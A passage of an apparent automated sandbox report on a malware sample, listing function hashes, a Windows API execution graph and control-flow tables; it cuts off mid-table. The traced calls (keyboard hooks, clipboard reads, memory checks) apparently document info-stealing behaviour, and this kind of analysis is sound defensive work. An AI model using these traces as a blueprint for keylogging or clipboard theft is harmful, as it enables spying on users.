                                                    Function 058A5897 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88015ef62520148c166f9b13a85ab2e078116b53e9220037c32ab8ad520d2c19
                                                    • Instruction ID: ce9e59ae7114de651386b773134c5c85f8d294017830a69d1d9120537a21ae2b
                                                    • Opcode Fuzzy Hash: 88015ef62520148c166f9b13a85ab2e078116b53e9220037c32ab8ad520d2c19
                                                    • Instruction Fuzzy Hash: 1C51A575E042189FDB08CFAAD98569EFBF2BF88310F14C16AE818AB354DB305946CF40
                                                    Function 058A5610 Relevance: .1, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 583d75e20a121d07266f0254b3f96fb69daa652fd532fdc608d7354a22f29888
                                                    • Instruction ID: a0936a90cb1319726c102cc7b994e857b0d3caf9327e0e6030bdb489dadbdfb9
                                                    • Opcode Fuzzy Hash: 583d75e20a121d07266f0254b3f96fb69daa652fd532fdc608d7354a22f29888
                                                    • Instruction Fuzzy Hash: DC518275D006199FDF08CFEAD8846EEBBB2BF88311F10802AE819AB254DB345946CF50
                                                    Function 058AC238 Relevance: .1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bcddbc52d0f70327f243b2a0c4150fe3f3c6d0dcf2750aaaf0d3fe2367603e03
                                                    • Instruction ID: 630f221dddc0c0e98c89b996da69747b7fe78c51069814368cbff76f73272951
                                                    • Opcode Fuzzy Hash: bcddbc52d0f70327f243b2a0c4150fe3f3c6d0dcf2750aaaf0d3fe2367603e03
                                                    • Instruction Fuzzy Hash: 9051FA71E042598FDB14CFA9C5805AEFBF2FF89304F24816AE818A7216D7309E41CFA1
                                                    Function 058AE1E9 Relevance: .1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2170497ed001ef1c017d97ad0aa8af3020109a3ff65f0e0c69378c2684b2d479
                                                    • Instruction ID: e1b6cad1f8028d5f1bd561e80ed90c69f4051279796473d37c185d1a5e660004
                                                    • Opcode Fuzzy Hash: 2170497ed001ef1c017d97ad0aa8af3020109a3ff65f0e0c69378c2684b2d479
                                                    • Instruction Fuzzy Hash: A9510975E042198FDB14CFAAC5405AEFBF6FF89304F24856AD818A7216D731AD41CFA1
                                                    Function 058A1069 Relevance: .1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 667a78395de92bd020076432f2487eeb91ed9ca20fdfbbac6acfecc4bc5437d7
                                                    • Instruction ID: 2397ff6a44030bef90c459432b1d3a63ca6083d62c5451c5b5227121323731f7
                                                    • Opcode Fuzzy Hash: 667a78395de92bd020076432f2487eeb91ed9ca20fdfbbac6acfecc4bc5437d7
                                                    • Instruction Fuzzy Hash: 7541B871E006198FEB58DFAAC94479EBBF2BF88300F14D4AAC45CE6255EB301A45CF51
                                                    Function 058A5603 Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1721309312.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_58a0000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5ebe0e9275afabf1e9e574bc36fec8c198ae2c957742ce286ea2151ca42bbb5
                                                    • Instruction ID: c9638276aefdbe78b7fd9ef596963a2529dac5815c9270248623b3f070c41607
                                                    • Opcode Fuzzy Hash: b5ebe0e9275afabf1e9e574bc36fec8c198ae2c957742ce286ea2151ca42bbb5
                                                    • Instruction Fuzzy Hash: 5C4174B5E006199FEB08DFAAD5856AEBBF2AF88310F14C02AD419AB354DB345945CF50

                                                    Execution Graph

                                                    Execution Coverage:13.8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.4%
                                                    Total number of Nodes:222
                                                    Total number of Limit Nodes:28
                                                    execution_graph 42240 292d030 42241 292d048 42240->42241 42243 292d0a2 42241->42243 42248 68539b4 42241->42248 42255 685399c 42241->42255 42263 6856183 42241->42263 42267 6856190 42241->42267 42271 685aab1 42241->42271 42249 6853987 42248->42249 42250 68539bb 42248->42250 42249->42243 42250->42249 42279 6853854 42250->42279 42252 6856329 42254 6856397 42252->42254 42283 6853864 42252->42283 42256 68539a7 42255->42256 42257 685ab41 42256->42257 42259 685ab31 42256->42259 42260 685ab3f 42257->42260 42308 6859ab4 42257->42308 42296 685ac58 42259->42296 42302 685ac68 42259->42302 42264 6856190 42263->42264 42265 685399c 2 API calls 42264->42265 42266 68561d7 42265->42266 42266->42243 42268 68561b6 42267->42268 42269 685399c 2 API calls 42268->42269 42270 68561d7 42269->42270 42270->42243 42273 685aaba 42271->42273 42272 685ab41 42274 6859ab4 2 API calls 42272->42274 42276 685ab3f 42272->42276 42273->42272 42275 685ab31 42273->42275 42274->42276 42277 685ac58 2 API calls 42275->42277 42278 685ac68 2 API calls 42275->42278 42277->42276 42278->42276 42280 685385f 42279->42280 42281 68549eb 42280->42281 42287 6854c11 42280->42287 42281->42252 42284 6854f30 GetModuleHandleW 42283->42284 42286 6854fa5 42284->42286 42286->42254 42288 6853864 GetModuleHandleW 42287->42288 42289 6854c29 42288->42289 42290 6853864 GetModuleHandleW 42289->42290 42295 6854df4 42289->42295 42291 6854d7a 42290->42291 42292 6853864 GetModuleHandleW 42291->42292 42291->42295 42293 6854dc8 42292->42293 42294 6853864 GetModuleHandleW 42293->42294 42293->42295 42294->42295 42295->42281 42298 685ac76 42296->42298 42297 6859ab4 2 API calls 42297->42298 42298->42297 42299 685ad4e 42298->42299 42315 685b130 42298->42315 42320 685b140 42298->42320 42299->42260 42304 685ac76 42302->42304 42303 6859ab4 2 API calls 42303->42304 42304->42303 42305 685ad4e 42304->42305 42306 685b130 OleGetClipboard 42304->42306 42307 685b140 OleGetClipboard 42304->42307 42305->42260 42306->42304 42307->42304 42309 6859abf 42308->42309 42310 685ae54 42309->42310 42311 685adaa 42309->42311 42312 685399c OleGetClipboard 42310->42312 42313 685ae02 CallWindowProcW 42311->42313 42314 685adb1 42311->42314 42312->42314 42313->42314 42314->42260 42316 685b136 42315->42316 42317 685b126 42316->42317 42325 685b6e7 42316->42325 42331 685b6f8 42316->42331 42317->42298 42321 685b15f 42320->42321 42322 685b1b6 42321->42322 42323 685b6e7 OleGetClipboard 42321->42323 42324 685b6f8 OleGetClipboard 42321->42324 42322->42298 42323->42321 42324->42321 42326 685b6f2 42325->42326 42328 685b63d 42326->42328 42337 685b731 42326->42337 42348 685b740 42326->42348 42327 685b729 42327->42316 42328->42316 42333 685b700 42331->42333 42332 685b714 42332->42316 42333->42332 42335 685b731 OleGetClipboard 42333->42335 42336 685b740 OleGetClipboard 42333->42336 42334 685b729 42334->42316 42335->42334 42336->42334 42338 685b73a 42337->42338 42339 685b76d 42338->42339 42341 685b7b1 42338->42341 42344 685b731 OleGetClipboard 42339->42344 42345 685b740 OleGetClipboard 42339->42345 42340 685b773 42340->42327 42343 685b831 42341->42343 42359 685ba08 42341->42359 42363 685b9f8 42341->42363 42342 685b84f 42342->42327 42343->42327 42344->42340 42345->42340 42349 685b752 42348->42349 42350 685b76d 42349->42350 42352 685b7b1 42349->42352 42355 685b731 OleGetClipboard 42350->42355 42356 685b740 OleGetClipboard 42350->42356 42351 685b773 42351->42327 42354 685b831 42352->42354 42357 685ba08 OleGetClipboard 42352->42357 42358 685b9f8 OleGetClipboard 42352->42358 42353 685b84f 42353->42327 42354->42327 42355->42351 42356->42351 42357->42353 42358->42353 42361 685ba1d 42359->42361 42362 685ba43 42361->42362 42367 685b4d0 42361->42367 42362->42342 42365 685ba08 42363->42365 42364 685b4d0 OleGetClipboard 42364->42365 42365->42364 42366 685ba43 42365->42366 42366->42342 42368 685bab0 OleGetClipboard 42367->42368 42370 685bb4a 42368->42370 42375 2978040 42377 2978086 DeleteFileW 42375->42377 42378 29780bf 42377->42378 42379 6859ed8 DuplicateHandle 42380 6859f6e 42379->42380 42381 6855fd8 42382 6856010 CreateWindowExW 42381->42382 42384 68560fc 42382->42384 42385 685b918 42386 685b923 42385->42386 42387 685b933 42386->42387 42389 685b3b8 42386->42389 42390 685b968 OleInitialize 42389->42390 42391 685b9cc 42390->42391 42391->42387 42371 6854f2b 42372 6854f72 42371->42372 42373 6854f78 GetModuleHandleW 42371->42373 42372->42373 42374 6854fa5 42373->42374 42392 2970848 42394 297084e 42392->42394 42393 297091b 42394->42393 42397 2971340 42394->42397 42407 2971458 42394->42407 42399 2971343 42397->42399 42400 29712df 42397->42400 42398 2971454 42398->42394 42399->42398 42402 2971458 7 API calls 42399->42402 42417 685d379 42399->42417 42423 685d388 42399->42423 42429 2978219 42399->42429 42434 6853348 42399->42434 42440 6853318 42399->42440 42400->42394 42402->42399 42409 2971356 42407->42409 42410 297145f 42407->42410 42408 2971454 42408->42394 42409->42408 42411 2971458 7 API calls 42409->42411 42412 685d379 SetWindowsHookExA 42409->42412 42413 685d388 SetWindowsHookExA 42409->42413 42414 6853318 2 API calls 42409->42414 42415 6853348 2 API calls 42409->42415 42416 2978219 4 API calls 42409->42416 42410->42394 42411->42409 42412->42409 42413->42409 42414->42409 42415->42409 42416->42409 42418 685d390 42417->42418 42419 685d3d5 42418->42419 42446 685d3d8 42418->42446 42450 685d46a 42418->42450 42454 685d3e8 42418->42454 42419->42399 42424 685d390 42423->42424 42425 685d3d5 42424->42425 42426 685d3d8 SetWindowsHookExA 42424->42426 42427 685d3e8 SetWindowsHookExA 42424->42427 42428 685d46a SetWindowsHookExA 42424->42428 42425->42399 42426->42424 42427->42424 42428->42424 42431 2978223 42429->42431 42430 29782d9 42430->42399 42431->42430 42462 686fa80 42431->42462 42467 686fa70 42431->42467 42435 685335a 42434->42435 42438 685340b 42435->42438 42472 6853084 42435->42472 42437 68533d1 42477 68530a4 42437->42477 42438->42399 42441 685331d 42440->42441 42442 6853084 GetModuleHandleW 42441->42442 42444 68532e2 42441->42444 42443 68533d1 42442->42443 42445 68530a4 KiUserCallbackDispatcher 42443->42445 42444->42399 42445->42444 42447 685d405 42446->42447 42449 685d468 42447->42449 42458 685c628 42447->42458 42449->42418 42452 685d425 42450->42452 42451 685d468 42451->42418 42452->42451 42453 685c628 SetWindowsHookExA 42452->42453 42453->42452 42456 685d405 42454->42456 42455 685d468 42455->42418 42456->42455 42457 685c628 SetWindowsHookExA 42456->42457 42457->42456 42459 685d5f0 SetWindowsHookExA 42458->42459 42461 685d67a 42459->42461 42461->42447 42463 686fa95 42462->42463 42464 686fca6 42463->42464 42465 686fcd0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 42463->42465 42466 686fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 42463->42466 42464->42430 42465->42463 42466->42463 42468 686fa95 42467->42468 42469 686fca6 42468->42469 42470 686fcd0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 42468->42470 42471 686fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 42468->42471 42469->42430 42470->42468 42471->42468 42473 685308f 42472->42473 42481 6854500 42473->42481 42490 68544eb 42473->42490 42474 68535aa 42474->42437 42479 68530af 42477->42479 42480 685b08b 42479->42480 42504 6859b0c 42479->42504 42480->42438 42482 685452b 42481->42482 42483 6853854 GetModuleHandleW 42482->42483 42484 6854592 42483->42484 42488 6853854 GetModuleHandleW 42484->42488 42499 68549d0 42484->42499 42485 68545da 42486 68545ae 42486->42485 42487 6853864 GetModuleHandleW 42486->42487 42487->42485 42488->42486 42491 685452b 42490->42491 42492 6853854 GetModuleHandleW 42491->42492 42493 6854592 42492->42493 42497 6853854 GetModuleHandleW 42493->42497 42498 68549d0 GetModuleHandleW 42493->42498 42494 68545ae 42495 68545da 42494->42495 42496 6853864 GetModuleHandleW 42494->42496 42495->42495 42496->42495 42497->42494 42498->42494 42500 68549ef 42499->42500 42501 68549eb 42499->42501 42502 6854b2e 42500->42502 42503 6854c11 GetModuleHandleW 42500->42503 42501->42486 42503->42502 42505 685b0a0 KiUserCallbackDispatcher 42504->42505 42507 685b10e 42505->42507 42507->42479

                                                    Executed Functions

                                                    Function 06862758 Relevance: 9.0, Strings: 6, Instructions: 1529COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-2392861976
                                                    • Opcode ID: 82d343e476acd147ad41e3c1d0071b33415e98a5f98b355c23a3d729aef29260
                                                    • Instruction ID: b743b6aeb22fc7f85a1e7a6ceca2ccc82a5ffed3e35c081fa94758e382cf8007
                                                    • Opcode Fuzzy Hash: 82d343e476acd147ad41e3c1d0071b33415e98a5f98b355c23a3d729aef29260
                                                    • Instruction Fuzzy Hash: 30E24734E002098FDB64DB69C594A9DB7F2FF89304F5485A9E509EB265EB30ED85CF80
                                                    Function 06867E90 Relevance: 3.0, Strings: 2, Instructions: 471COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1166 6867e90-6867eae 1167 6867eb0-6867eb3 1166->1167 1168 6867ed4-6867ed7 1167->1168 1169 6867eb5-6867ecf 1167->1169 1170 6867eee-6867ef1 1168->1170 1171 6867ed9-6867ee7 1168->1171 1169->1168 1172 6867f14-6867f17 1170->1172 1173 6867ef3-6867f0f 1170->1173 1182 6867f36-6867f4c 1171->1182 1183 6867ee9 1171->1183 1175 6867f24-6867f26 1172->1175 1176 6867f19-6867f23 1172->1176 1173->1172 1178 6867f2d-6867f30 1175->1178 1179 6867f28 1175->1179 1178->1167 1178->1182 1179->1178 1186 6868167-6868171 1182->1186 1187 6867f52-6867f5b 1182->1187 1183->1170 1188 6868172-68681a7 1187->1188 1189 6867f61-6867f7e 1187->1189 1192 68681a9-68681ac 1188->1192 1198 6868154-6868161 1189->1198 1199 6867f84-6867fac 1189->1199 1194 68681b2-68681c1 1192->1194 1195 68683e1-68683e4 1192->1195 1203 68681c3-68681de 1194->1203 1204 68681e0-6868224 1194->1204 1196 68683e6-6868402 1195->1196 1197 6868407-686840a 1195->1197 1196->1197 1201 68684b5-68684b7 1197->1201 1202 6868410-686841c 1197->1202 1198->1186 1198->1187 1199->1198 1217 6867fb2-6867fbb 1199->1217 1206 68684be-68684c1 1201->1206 1207 68684b9 1201->1207 1209 6868427-6868429 1202->1209 1203->1204 1222 68683b5-68683cb 1204->1222 1223 686822a-686823b 1204->1223 1206->1192 1210 68684c7-68684d0 1206->1210 1207->1206 1212 6868441-6868445 1209->1212 1213 686842b-6868431 1209->1213 1220 6868447-6868451 1212->1220 1221 6868453 1212->1221 1218 6868435-6868437 1213->1218 1219 6868433 1213->1219 1217->1188 1224 6867fc1-6867fdd 1217->1224 1218->1212 1219->1212 1226 6868458-686845a 1220->1226 1221->1226 1222->1195 1233 68683a0-68683af 1223->1233 1234 6868241-686825e 1223->1234 1236 6868142-686814e 1224->1236 1237 6867fe3-686800d 1224->1237 1228 686845c-686845f 1226->1228 1229 686846b-68684a4 1226->1229 1228->1210 1229->1194 1249 68684aa-68684b4 1229->1249 1233->1222 1233->1223 1234->1233 1243 6868264-686835a call 68666b0 1234->1243 1236->1198 1236->1217 1250 6868013-686803b 1237->1250 1251 6868138-686813d 1237->1251 1299 686835c-6868366 1243->1299 1300 6868368 1243->1300 1250->1251 1257 6868041-686806f 1250->1257 1251->1236 1257->1251 1263 6868075-686807e 1257->1263 1263->1251 1265 6868084-68680b6 1263->1265 1272 68680c1-68680dd 1265->1272 1273 68680b8-68680bc 1265->1273 1272->1236 1274 68680df-6868136 call 68666b0 1272->1274 1273->1251 1276 68680be 1273->1276 1274->1236 1276->1272 1301 686836d-686836f 1299->1301 1300->1301 1301->1233 1302 6868371-6868376 1301->1302 1303 6868384 1302->1303 1304 6868378-6868382 1302->1304 1305 6868389-686838b 1303->1305 1304->1305 1305->1233 1306 686838d-6868399 1305->1306 1306->1233
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q
                                                    • API String ID: 0-355816377
                                                    • Opcode ID: 65a6b80e0d2867a98554a28ee3af2a40b29f19785bb4ce202f55159ca4653367
                                                    • Instruction ID: ba5f3413dfade6174fa1dae40cda175e76c341456c13fcf2d44d8fd83a8e4a1f
                                                    • Opcode Fuzzy Hash: 65a6b80e0d2867a98554a28ee3af2a40b29f19785bb4ce202f55159ca4653367
                                                    • Instruction Fuzzy Hash: DE02AD30B002098FDB54DB6AD990AAEB7F2FF84304F148569E519DB394DB71EC86CB91
                                                    Function 068656A8 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2705 68656a8-68656c5 2706 68656c7-68656ca 2705->2706 2707 6865702-6865705 2706->2707 2708 68656cc-68656d2 2706->2708 2711 6865707-6865709 2707->2711 2712 686570c-686570f 2707->2712 2709 686588b-68658bb 2708->2709 2710 68656d8-68656e0 2708->2710 2727 68658c5-68658c8 2709->2727 2710->2709 2713 68656e6-68656f3 2710->2713 2711->2712 2714 6865723-6865726 2712->2714 2715 6865711-686571e 2712->2715 2713->2709 2719 68656f9-68656fd 2713->2719 2716 6865728-686572e 2714->2716 2717 6865739-686573c 2714->2717 2715->2714 2720 6865734 2716->2720 2721 6865825-686582f 2716->2721 2722 686573e-6865745 2717->2722 2723 686574a-686574d 2717->2723 2719->2707 2720->2717 2730 6865836-6865838 2721->2730 2722->2723 2725 6865760-6865763 2723->2725 2726 686574f-6865755 2723->2726 2733 6865765-686576e 2725->2733 2734 686576f-6865772 2725->2734 2728 686575b 2726->2728 2729 6865818-686581b 2726->2729 2731 68658ea-68658ed 2727->2731 2732 68658ca-68658ce 2727->2732 2728->2725 2735 6865820-6865823 2729->2735 2736 686583d-6865840 2730->2736 2739 6865901-6865904 2731->2739 2740 68658ef-68658f6 2731->2740 2737 68658d4-68658dc 2732->2737 2738 68659ba-68659c8 2732->2738 2741 6865774-686577a 2734->2741 2742 6865785-6865788 2734->2742 2735->2721 2735->2736 2743 6865842-6865854 2736->2743 2744 6865859-686585c 2736->2744 2737->2738 2745 68658e2-68658e5 2737->2745 2768 68659ca-68659f4 2738->2768 2769 68659f8-68659f9 2738->2769 2749 6865926-6865929 2739->2749 2750 6865906-686590a 2739->2750 2746 68659b2-68659b9 2740->2746 2747 68658fc 2740->2747 2741->2708 2748 6865780 2741->2748 2751 6865790-6865793 2742->2751 2752 686578a-686578b 2742->2752 2743->2744 2744->2716 2758 6865862-6865865 2744->2758 2745->2731 2747->2739 2748->2742 2755 6865947-686594a 2749->2755 2756 686592b-686592f 2749->2756 2750->2738 2759 6865910-6865918 2750->2759 2753 68657a4-68657a7 2751->2753 2754 6865795-6865799 2751->2754 2752->2751 2763 68657b1-68657b4 2753->2763 2764 68657a9-68657ac 2753->2764 2761 686579f 2754->2761 2762 686587d-686588a 2754->2762 2766 6865962-6865965 2755->2766 2767 686594c-686595d 2755->2767 2756->2738 2765 6865935-686593d 2756->2765 2758->2741 2771 686586b-686586d 2758->2771 2759->2738 2760 686591e-6865921 2759->2760 2760->2749 2761->2753 2773 68657b6-68657d5 2763->2773 2774 68657da-68657dd 2763->2774 2764->2763 2765->2738 2772 686593f-6865942 2765->2772 2775 6865967-686596e 2766->2775 2776 686596f-6865972 2766->2776 2767->2766 2777 68659f6 2768->2777 2778 6865a07-6865a0a 2769->2778 2779 68659fb-6865a02 2769->2779 2780 6865874-6865877 2771->2780 2781 686586f 2771->2781 2772->2755 2773->2774 2783 68657f3-68657f6 2774->2783 2784 68657df-68657ee 2774->2784 2785 6865974-6865978 2776->2785 2786 686598c-686598f 2776->2786 2777->2769 2787 6865cf3-6865cf6 2778->2787 2788 6865a10-6865ba4 2778->2788 2779->2778 2780->2706 2780->2762 2781->2780 2795 6865813-6865816 2783->2795 2796 68657f8-686580e 2783->2796 2784->2783 2785->2738 2794 686597a-6865982 2785->2794 2789 68659a0-68659a2 2786->2789 2790 6865991-686599b 2786->2790 2792 6865d0e-6865d11 2787->2792 2793 6865cf8-6865d0b 2787->2793 2856 6865cdd-6865cf0 2788->2856 2857 6865baa-6865bb1 2788->2857 2800 68659a4 2789->2800 2801 68659a9-68659ac 2789->2801 2790->2789 2797 6865d13-6865d24 2792->2797 2798 6865d2b-6865d2e 2792->2798 2794->2738 2803 6865984-6865987 2794->2803 2795->2729 2795->2735 2796->2795 2813 6865d26 2797->2813 2814 6865d73-6865d7a 2797->2814 2806 6865d30-6865d41 2798->2806 2807 6865d48-6865d4b 2798->2807 2800->2801 2801->2727 2801->2746 2803->2786 2816 6865d56-6865d67 2806->2816 2820 6865d43 2806->2820 2807->2788 2812 6865d51-6865d54 2807->2812 2812->2816 2817 6865d6e-6865d71 2812->2817 2813->2798 2818 6865d7f-6865d82 2814->2818 2816->2814 2826 6865d69 2816->2826 2817->2814 2817->2818 2818->2788 2821 6865d88-6865d8b 2818->2821 2820->2807 2823 6865d8d-6865d9e 2821->2823 2824 6865da9-6865dac 2821->2824 2823->2793 2833 6865da4 2823->2833 2827 6865dc6-6865dc9 2824->2827 2828 6865dae-6865dbf 2824->2828 2826->2817 2831 6865dd3-6865dd5 2827->2831 2832 6865dcb-6865dd0 2827->2832 2828->2814 2838 6865dc1 2828->2838 2835 6865dd7 2831->2835 2836 6865ddc-6865ddf 2831->2836 2832->2831 2833->2824 2835->2836 2836->2777 2837 6865de5-6865dee 2836->2837 2838->2827 2858 6865bb7-6865bda 2857->2858 2859 6865c65-6865c6c 2857->2859 2868 6865be2-6865bea 2858->2868 2859->2856 2860 6865c6e-6865ca1 2859->2860 2872 6865ca6-6865cd3 2860->2872 2873 6865ca3 2860->2873 2869 6865bef-6865c30 2868->2869 2870 6865bec 2868->2870 2881 6865c32-6865c43 2869->2881 2882 6865c48-6865c59 2869->2882 2870->2869 2872->2837 2873->2872 2881->2837 2882->2837
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-3993045852
                                                    • Opcode ID: 1cc3251a5f5fd5aceb994ab2183192b4b08132f9067babadc72b3f5617b72f18
                                                    • Instruction ID: 57e5f9bff62a1c2e714ccc9d8954d035a73e7b4cfbb91edf11a1af1d2963c8b4
                                                    • Opcode Fuzzy Hash: 1cc3251a5f5fd5aceb994ab2183192b4b08132f9067babadc72b3f5617b72f18
                                                    • Instruction Fuzzy Hash: B622E431F002098FDF64DFA5D4846AEBBB2EF84314F208469E549EB354DA35DD42CB92
                                                    Function 0685C628 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0685D458,00000000,00000000), ref: 0685D66B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: 5214f62a23a82c6572aa4b8d9e767e11bdfeb569aa160904875aca40ec1f932a
                                                    • Instruction ID: 81bf12a9ff0efb202bf7915defe69238a543624d9bace2e366cf3e9eec3089ed
                                                    • Opcode Fuzzy Hash: 5214f62a23a82c6572aa4b8d9e767e11bdfeb569aa160904875aca40ec1f932a
                                                    • Instruction Fuzzy Hash: 612147B5D002098FCB54DF9AC844BEEFBF4EF88314F108429E959A7250D774A945CFA5
                                                    Function 06866700 Relevance: .8, Instructions: 812COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87392cbd77b4cb04ce887c6aaa75bfaec626d4e8a7bb311104c7ec4b2c503b45
                                                    • Instruction ID: 8dcb9ad9bf813bf6ab108b5109fa4567143646368b06e01eb1afac78cf4c4a7b
                                                    • Opcode Fuzzy Hash: 87392cbd77b4cb04ce887c6aaa75bfaec626d4e8a7bb311104c7ec4b2c503b45
                                                    • Instruction Fuzzy Hash: 8C62A134F002048FDB54DB69D594AAEB7F2EF88314F148569E906EB354EB35EC82CB91
                                                    Function 0686ADE0 Relevance: 10.4, Strings: 8, Instructions: 389COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 686ade0-686adfe 1 686ae00-686ae03 0->1 2 686ae26-686ae29 1->2 3 686ae05-686ae21 1->3 4 686ae2f-686ae32 2->4 5 686affd-686b006 2->5 3->2 9 686ae46-686ae49 4->9 10 686ae34-686ae41 4->10 6 686b00c-686b016 5->6 7 686ae89-686ae92 5->7 11 686b017-686b04e 7->11 12 686ae98-686ae9c 7->12 13 686ae5a-686ae5d 9->13 14 686ae4b-686ae4f 9->14 10->9 26 686b050-686b053 11->26 16 686aea1-686aea4 12->16 19 686ae67-686ae6a 13->19 20 686ae5f-686ae64 13->20 14->6 18 686ae55 14->18 24 686aea6-686aeaf 16->24 25 686aeb4-686aeb6 16->25 18->13 21 686ae84-686ae87 19->21 22 686ae6c-686ae7f 19->22 20->19 21->7 21->16 22->21 24->25 27 686aebd-686aec0 25->27 28 686aeb8 25->28 30 686b076-686b079 26->30 31 686b055-686b071 26->31 27->1 32 686aec6-686aeea 27->32 28->27 33 686b07b call 686b3df 30->33 34 686b088-686b08b 30->34 31->30 49 686aef0-686aeff 32->49 50 686affa 32->50 39 686b081-686b083 33->39 35 686b08d-686b091 34->35 36 686b098-686b09b 34->36 40 686b093 35->40 41 686b0a1-686b0dc 35->41 36->41 42 686b304-686b307 36->42 39->34 40->36 53 686b0e2-686b0ee 41->53 54 686b2cf-686b2e2 41->54 44 686b314-686b316 42->44 45 686b309-686b313 42->45 47 686b31d-686b320 44->47 48 686b318 44->48 47->26 52 686b326-686b330 47->52 48->47 57 686af17-686af52 call 68666b0 49->57 58 686af01-686af07 49->58 50->5 62 686b0f0-686b109 53->62 63 686b10e-686b152 53->63 56 686b2e4 54->56 56->42 74 686af54-686af5a 57->74 75 686af6a-686af81 57->75 60 686af0b-686af0d 58->60 61 686af09 58->61 60->57 61->57 62->56 79 686b154-686b166 63->79 80 686b16e-686b1ad 63->80 77 686af5e-686af60 74->77 78 686af5c 74->78 87 686af83-686af89 75->87 88 686af99-686afaa 75->88 77->75 78->75 79->80 84 686b294-686b2a9 80->84 85 